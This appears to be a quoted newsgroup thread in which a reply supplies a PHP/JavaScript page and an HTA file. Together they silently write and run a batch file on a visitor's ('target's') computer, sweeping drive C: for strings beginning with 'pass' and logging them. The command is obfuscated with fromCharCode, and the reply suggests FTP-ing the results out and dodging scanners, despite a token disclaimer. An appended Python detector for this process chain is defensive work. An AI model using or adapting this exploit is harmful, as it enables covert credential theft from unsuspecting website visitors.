The Magpie wrote:
Ray Muforosky wrote:
Task: I want to do a file search, using the "containing text" option, from
a web page.
Most modern browsers have implemented a cross-domain access policy for
client-side scripting,
making it near impossible to effectively achieve this task with
standard HTML.
MSIE's HyperText Applications (*.HTA), on the other hand, are a much more
promiscuous doctype and
can access the coveted protected local domain.
Furthermore .exe's can be arbitrarily executed from .HTA's in IE.
How do I search for a file on my local drive containing a certain
string, from a web page?
The XP command line to search for a string (in this case strings with
words starting with "pass") and save the results would be something
like (the results have to be redirected with ">"; a bare trailing file
name is just another file for findstr to search):
findstr /p /i /s "\<pass.*" c:\*.* > c:\pass.txt
Full syntax reference:
http://www.microsoft.com/resources/d...s/findstr.mspx
Still, at this point, even though we can pop open an exe via script in
IE's chromeless client, how are we going to pass the command-line switch
variables?
All those slashes and wildcards don't look like they'd make very good
tag soup... maybe encode it. Dunno if the direct approach would work too
smoothly though.
That is, how do you run the Windows search program
from a web page?
Not, I am sure, by using Javascript - so I am afraid you will probably
need to ask in a Microsoft newsgroup.
A possible workaround is to pass the command switches via file
encapsulation and deliver it via a local file exploit (created by
SPTH).
Use PHP & JavaScript to write a local .bat (on your target's computer)
containing your findstr search line, and then, in theory, auto-refresh to
an .HTA which executes the local .bat with VBScript.
File: search.php
<?php
$nl = chr(13).chr(10);
echo '<html><head>';
echo '<script language='.chr(34).'JavaScript'.chr(34).'>'.$nl;
echo 'function go(){'.$nl;
// Scripting.FileSystemObject is only reachable from IE/HTA with ActiveX allowed
echo 'var fso=new ActiveXObject('.chr(34).'Scripting.FileSystemObject'.chr(34).')'.$nl;
echo 'var file=fso.CreateTextFile('.chr(34).'C:\\\search.bat'.chr(34).')'.$nl;
// The findstr line the batch file will contain; results are redirected to c:\pass.txt
$cont = "findstr /p /i /s \"\<pass.*\" c:\*.* > c:\pass.txt";
// Emit the command as a String.fromCharCode() chain so that no quotes,
// slashes or wildcards appear literally in the page source
echo 'file.Write(';
for ($i = 0; $i < strlen($cont); $i++) {
    echo 'String.fromCharCode('.ord($cont[$i]).')+';
}
echo chr(34).chr(34).')'.$nl;
echo 'file.Close()}'.$nl;
echo '</script>';
// Give go() 15 seconds to write the batch file, then load the HTA that runs it
echo '<meta http-equiv='.chr(34).'refresh'.chr(34).' content='.chr(34).'15; url=run.hta'.chr(34).'>';
echo '</head>'.$nl.$nl;
?>
<body onload="go()"></body></html>
Code lifted and warped from:
http://vx.netlux.org/lib/vsp13.html
File: run.hta
<html>
<head>
<HTA:APPLICATION ID="HTA"
VERSION="1.0"
APPLICATIONNAME="RemoteSearch"
BORDER="thin"
BORDERSTYLE="normal"
CAPTION="yes"
CONTEXTMENU="no"
ICON=""
INNERBORDER="yes"
MAXIMIZEBUTTON="no"
MINIMIZEBUTTON="no"
NAVIGABLE="yes"
SCROLL="no"
SCROLLFLAT="yes"
SELECTION="yes"
SHOWINTASKBAR="yes"
SINGLEINSTANCE="yes"
SYSMENU="yes"
WINDOWSTATE="normal"
/>
<script language="VBScript">
' An HTA runs outside IE's security zones with the user's full rights,
' so WScript.Shell is available and will launch whatever path it is given.
Dim objShell
Sub Run(Name)
On Error Resume Next
Set objShell = CreateObject("WScript.Shell")
objShell.Run Name
Set objShell = Nothing
End Sub
</script>
</head>
<body onload="javascript:Run('C:\\search.bat');"></body></html>
Code lifted and warped from:
http://www.experts-exchange.com/Web/..._20709676.html
So there we go (it's not tested, but the example is based on working
concepts).
We've infiltrated, searched and even logged the results. Now all you
have to do is recover the data (perhaps via another line in the .bat to
FTP the file).
The above PHP/JS exploit should write local files without warning. .hta
files, on the other hand, pop up an alert box while loading, plus any
clever malware scanner would probably spot or prevent the process.
You may be able to write the .hta locally and then load it to get
around the warning, or maybe not. Either way it's going to be mighty
obvious when the DOS box pops up for a few seconds (or minutes if
you're searching a lot of local sub-directories).
Disclaimer: The examples are provided for entertainment / edu only. I
take no responsibility for how you implement this code, if it violates
your host's TOS, or if it destroys your computer or the computer of any
user that YOU subject to its wrath. If I were you I'd accept that it's
a bad idea and totally against general net etiquette, an obvious
violation of privacy, and could potentially get you arrested very
quickly.
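An added, detection-side example that is not part of the thread and not code by any of the posters. The poster notes that a malware scanner would probably spot the process; this shows what such a rule looks like for the chain the thread describes: mshta.exe loading run.hta, WScript.Shell handing search.bat to cmd.exe, and findstr recursing (/s) over c:\*.*. The process-creation records are constructed and use a simplified "pid|ppid|image|cmdline" layout of my own, not real Sysmon or ETW output; the image names and the 8-level ancestry limit are assumptions.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed process-creation records in a simplified "pid|ppid|image|cmdline"
# form (not real Sysmon/ETW output). They model the chain from the thread:
# mshta.exe loads run.hta, WScript.Shell runs search.bat, findstr sweeps c:\*.*
SAMPLE_EVENTS = [
    r"1000|900|C:\Windows\explorer.exe|explorer.exe",
    r"1001|1000|C:\Windows\System32\mshta.exe|mshta.exe C:\run.hta",
    r"1002|1001|C:\Windows\System32\cmd.exe|cmd.exe /c C:\search.bat",
    r'1003|1002|C:\Windows\System32\findstr.exe|findstr /p /i /s "\<pass.*" c:\*.*',
    r"1004|1000|C:\Windows\System32\cmd.exe|cmd.exe /c dir",
    r'1005|1004|C:\Windows\System32\findstr.exe|findstr /i "error" C:\logs\app.log',
    r'1006|1004|C:\Windows\System32\findstr.exe|findstr /s /i "todo" C:\src\*.py',
]


@dataclass
class Event:
    pid: int
    ppid: int
    image: str
    cmdline: str


def parse_events(lines: List[str]) -> List[Event]:
    """Parse the constructed 'pid|ppid|image|cmdline' records."""
    events = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        pid, ppid, image, cmdline = line.split("|", 3)
        events.append(Event(int(pid), int(ppid), image, cmdline))
    return events


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


# Script hosts / shells an HTA commonly hands a payload to (assumed list)
SHELLS = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe"}

# A bare drive-root wildcard such as c:\* or c:\*.* standing as its own token
DRIVE_ROOT_GLOB = re.compile(r"(?<!\S)[A-Za-z]:\\\*(?:\.\*)?(?=\s|$)")


def findstr_is_drive_wide(cmdline: str) -> bool:
    """True when findstr is told to recurse (/s) starting at the root of a drive."""
    recursive = any(tok.lower() == "/s" for tok in cmdline.split())
    return recursive and DRIVE_ROOT_GLOB.search(cmdline) is not None


def ancestors(ev: Event, by_pid: Dict[int, Event], max_depth: int = 8) -> List[str]:
    """Image basenames of the parent, grandparent, ... up to max_depth levels."""
    chain, cur = [], ev
    for _ in range(max_depth):
        parent = by_pid.get(cur.ppid)
        if parent is None:
            break
        chain.append(basename(parent.image))
        cur = parent
    return chain


def detect(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (pid, alert) pairs for the HTA -> shell -> drive-wide findstr pattern."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        img = basename(e.image)
        parent = by_pid.get(e.ppid)
        # 1. mshta.exe spawning a script host or shell
        if img in SHELLS and parent is not None and basename(parent.image) == "mshta.exe":
            alerts.append((e.pid, "hta_spawned_shell"))
        # 2. findstr sweeping a whole drive; severity rises if an HTA is in the ancestry
        if img == "findstr.exe" and findstr_is_drive_wide(e.cmdline):
            severity = "high" if "mshta.exe" in ancestors(e, by_pid) else "medium"
            alerts.append((e.pid, f"drive_wide_findstr:{severity}"))
    return alerts


if __name__ == "__main__":
    for pid, alert in detect(parse_events(SAMPLE_EVENTS)):
        print(pid, alert)
```

On the sample records this flags pid 1002 (cmd.exe launched by mshta.exe) and pid 1003 (the drive-wide findstr with an HTA ancestor), while the ordinary findstr runs under pid 1004 stay quiet; the recursive search of C:\src\*.py is deliberately not flagged, since the drive-root glob is what distinguishes the credential sweep from everyday use.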